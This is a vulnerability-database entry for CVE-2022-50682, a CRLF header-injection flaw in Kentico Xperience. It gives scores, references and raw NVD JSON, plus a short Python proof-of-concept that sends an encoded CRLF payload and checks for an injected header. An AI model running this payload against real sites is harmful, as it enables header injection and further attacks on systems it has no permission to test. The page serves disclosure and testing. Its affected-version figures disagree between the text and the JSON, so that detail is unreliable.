CVE-2022-50682

Description

A CRLF injection vulnerability in Kentico Xperience allows attackers to manipulate URL query string redirects via improper encoding in the routing engine. This could enable header injection and potentially facilitate further web application attacks.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:kentico:xperience:*:*:*:*:*:*:*:* - VULNERABLE

Kentico Xperience < 13.0.200

Kentico Xperience < 12.0.180

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# CVE-2022-50682 CRLF Injection PoC for Kentico Xperience
# This PoC demonstrates header injection via CRLF in URL query string

target_url = "http://target-site.com/"

# Malicious URL with CRLF injection
# %0d%0a = URL encoded \r\n (CRLF)
payload = "/?redirect=%0d%0aInjected-Header:malicious-value"

full_url = target_url + payload

print(f"[*] Sending request to: {full_url}")
print(f"[*] Payload: {payload}")

try:
    response = requests.get(full_url, timeout=10, allow_redirects=False)
    
    print(f"\n[+] Response Status: {response.status_code}")
    print(f"[+] Response Headers:")
    
    for header, value in response.headers.items():
        print(f"    {header}: {value}")
    
    # Check if injection was successful
    if 'Injected-Header' in response.headers:
        print("\n[!] VULNERABLE: CRLF injection successful!")
        print(f"[!] Injected header found: {response.headers.get('Injected-Header')}")
    else:
        print("\n[-] No obvious injection detected (may require further testing)")
        
except requests.exceptions.RequestException as e:
    print(f"[!] Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2022-50682
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2022-50682
[3] CVE Details https://www.cvedetails.com/cve/CVE-2022-50682/
[4] VulDB https://vuldb.com/cve/CVE-2022-50682
[5] https://devnet.kentico.com/download/hotfixes
[6] https://www.vulncheck.com/advisories/kentico-xperience-routing-engine-crlf-injection

Raw JSON Data

JSON

{"cve": {"id": "CVE-2022-50682", "sourceIdentifier": "[email protected]", "published": "2025-12-18T20:15:50.287", "lastModified": "2025-12-24T17:03:26.313", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A CRLF injection vulnerability in Kentico Xperience allows attackers to manipulate URL query string redirects via improper encoding in the routing engine. This could enable header injection and potentially facilitate further web application attacks."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-93"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kentico:xperience:*:*:*:*:*:*:*:*", "versionEndIncluding": "13.0.79", "matchCriteriaId": "05B37759-8ECC-4722-9515-936E24D9EE22"}]}]}], "references": [{"url": "https://devnet.kentico.com/download/hotfixes", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/kentico-xperience-routing-engine-crlf-injection", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}